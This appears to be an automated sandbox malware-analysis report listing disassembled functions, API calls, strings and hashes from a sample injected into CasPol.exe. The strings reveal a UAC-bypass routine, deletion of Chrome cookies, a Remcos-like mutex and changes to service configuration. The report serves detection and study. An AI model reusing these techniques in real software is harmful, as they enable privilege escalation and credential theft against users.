• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• API String ID: 3851391207-2637227304
• Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
• Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
• Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
• Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
• int.LIBCPMT ref: 0040FEF2
  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
• std::_Facet_Register.LIBCPMT ref: 0040FF2E
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
• String ID: H]G
• API String ID: 2536120697-1717957184
• Opcode ID: 831260e2e50258e734e800f671c2e221e985db4fe4157639c37b4271b6a7a30d
                                                                                                                                                                                                                                  • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 831260e2e50258e734e800f671c2e221e985db4fe4157639c37b4271b6a7a30d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                                                                                                                  • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                                                                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                                                                                                                  • UserProfile, xrefs: 0040B2B4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                                                                  • API String ID: 2018770650-304995407
                                                                                                                                                                                                                                  • Opcode ID: 83418db9db8d519c039b1a05c5cc056cc5f53273bb6f80aec581b2d4f8100a24
                                                                                                                                                                                                                                  • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83418db9db8d519c039b1a05c5cc056cc5f53273bb6f80aec581b2d4f8100a24
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Rmc-EC111K$BG
                                                                                                                                                                                                                                  • API String ID: 0-200129539
                                                                                                                                                                                                                                  • Opcode ID: f596dccec36ba2edb01e8497e1ae222ff2b81d3db646b198ce2a52f1bf770b1f
                                                                                                                                                                                                                                  • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f596dccec36ba2edb01e8497e1ae222ff2b81d3db646b198ce2a52f1bf770b1f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                                                                                                                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                                                                                                                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                                                                                  • String ID: Alarm triggered$`Wu
                                                                                                                                                                                                                                  • API String ID: 614609389-1738255680
                                                                                                                                                                                                                                  • Opcode ID: 69d5291e15693288b4d3e9b4f6d1ae394db74f315fb7dff35188cd3ac97623b5
                                                                                                                                                                                                                                  • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69d5291e15693288b4d3e9b4f6d1ae394db74f315fb7dff35188cd3ac97623b5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 00439789
                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 004397BC
                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                                                                                                                                                  • __allrem.LIBCMT ref: 004397F1
                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1992179935-0
                                                                                                                                                                                                                                  • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                                                                                                                                  • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,04576FFD,00000000,?,?,?,04578A72,?,?,00000100), ref: 0457887B
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,04578A72,?,?,00000100,5EFC4D8B,?,?), ref: 04578901
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 045789FB
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 04578A08
                                                                                                                                                                                                                                    • Part of subcall function 045756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04575702
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 04578A11
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 04578A36
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: b6f146b5f655d2d647eb83cc3e161f4c28468681224a4fd87251e8876c73095e
• Instruction ID: d25fbb7da888f26715dbf87edf3695ee0eef2f4bf4d06facd1cc7c889e16671a
• Opcode Fuzzy Hash: b6f146b5f655d2d647eb83cc3e161f4c28468681224a4fd87251e8876c73095e
• Instruction Fuzzy Hash: B851B27261021AABEB25AE64FC48EBB77A9FF80764F154A39F804D6140FB34FC54E650
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,1001B43F,00000001,00000001,?), ref: 1001B248
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,?,?,?,1001B43F,00000001,00000001,?), ref: 1001B2CE
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1001B3C8
• __freea.LIBCMT ref: 1001B3D5
  • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
• __freea.LIBCMT ref: 1001B3DE
• __freea.LIBCMT ref: 1001B403
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 713b21457b86c78c97a8fa2f39a5facc734242a0c8a2d842c960e8097c1d1dbc
• Instruction ID: 2ed5a0c60fab733cb76eb0d012d0445d28864b3239f3e6487cb8682899a93c8b
• Opcode Fuzzy Hash: 713b21457b86c78c97a8fa2f39a5facc734242a0c8a2d842c960e8097c1d1dbc
• Instruction Fuzzy Hash: AE51F372600A16ABEB15CFA4CC81EAF37E9EF44690F524229FD14DE180EB74EDD1C660
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
• Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
• Opcode Fuzzy Hash: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
• Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: __freea$__alloca_probe_16
• String ID: a/p$am/pm
• API String ID: 3509577899-3206640213
• Opcode ID: e0c58fd508ac7f9020f233231798530ee610dc717e528da9a7e0b991552c4189
• Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
• Opcode Fuzzy Hash: e0c58fd508ac7f9020f233231798530ee610dc717e528da9a7e0b991552c4189
• Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
APIs
• _strlen.LIBCMT ref: 04571607
• _strcat.LIBCMT ref: 0457161D
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,0457190E,?,?,00000000,?,00000000), ref: 04571643
• lstrcatW.KERNEL32(?,?,?,?,?,?,0457190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 0457165A
• lstrlenW.KERNEL32(?,?,?,?,?,0457190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 04571661
• lstrcatW.KERNEL32(00001008,?,?,?,?,?,0457190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 04571686
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: lstrcatlstrlen$_strcat_strlen
• String ID:
• API String ID: 1922816806-0
• Opcode ID: 757b7f7b6f64878c5d3fcfbc57e01019f39a198a556b658b858a93ce2cdcbbb5
• Instruction ID: 22e0d8615fdaffd69c407aa0ae27b7eacf0633cae6d51130fe388283523fad94
• Opcode Fuzzy Hash: 757b7f7b6f64878c5d3fcfbc57e01019f39a198a556b658b858a93ce2cdcbbb5
• Instruction Fuzzy Hash: 2C21C836900204ABD704AB54FC84EEE77B8FF89714F14403AE504AB241EB34B945A7A5
APIs
• lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 04571038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0457104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 04571061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 04571075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 04571090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 045710B8
Memory Dump Source
• Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
• Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0
• Opcode ID: a1f246a52a1322b1d1b839036d91bc99927e8f5025ac7d42a48c6ca691976ddb
• Instruction ID: 1c57e1281a86ed6b1a91a35061e716d5b883dd80d5cdeeaf912082d4f0d0fb74
• Opcode Fuzzy Hash: a1f246a52a1322b1d1b839036d91bc99927e8f5025ac7d42a48c6ca691976ddb
• Instruction Fuzzy Hash: DB2141359006299BDF20EE64FC48DDB3779FF84318F1045A6E855972A1EE30EA89DB50
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
• CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 493672254-0
                                                                                                                                                                                                                                  • Opcode ID: a2f105e535d183d5d78deb6f7d5fe7bea4f0d81e54f61eac1a98da6bf8b63e62
                                                                                                                                                                                                                                  • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2f105e535d183d5d78deb6f7d5fe7bea4f0d81e54f61eac1a98da6bf8b63e62
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,04573518,045723F1,04571F17), ref: 04573864
                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04573872
                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0457388B
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,04573518,045723F1,04571F17), ref: 045738DD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                  • Opcode ID: 564d52d78a3d3af8e2040048a1cba37d4b6d10f4b3c9a1b252e021533117c738
                                                                                                                                                                                                                                  • Instruction ID: 510dfaafbd030a1f6e6e1bc8c3f251b8e520a102288e88ab574a68b4d9ad34c5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 564d52d78a3d3af8e2040048a1cba37d4b6d10f4b3c9a1b252e021533117c738
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF01AC3261A7269DF7152A797C889562754FF45B79730023DED14690D0FF2A7C09F344
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                  • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                                                                                                                                  • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,04576C6C), ref: 04575AFA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575B2D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575B55
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,04576C6C), ref: 04575B62
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,04576C6C), ref: 04575B6E
                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 04575B74
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: b85df41bbece85dab9066562e7d976f7d7b81c42773a6b3f51fca6ee47d8ffec
                                                                                                                                                                                                                                  • Instruction ID: 2532f5d7d5dc6ad189af1356b181d2866be4c72e17c66fdaabfb839cde52e2fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b85df41bbece85dab9066562e7d976f7d7b81c42773a6b3f51fca6ee47d8ffec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF0CD3254450AFBF75236347C48E3E2B65FFC1975B240138FD1EA6980FE25A80A7165
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                  • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,1000310F,1000E403,1000310F,?,?,1000FF84,?,1000310F,?), ref: 10016A80
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10016AB3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10016ADB
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,1000310F,?,?,?,?,?,?,?,?,100147C0,?,00000000,?,1000310F), ref: 10016AE8
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,1000310F,?,?,?,?,?,?,?,?,100147C0,?,00000000,?,1000310F), ref: 10016AF4
                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 10016AFA
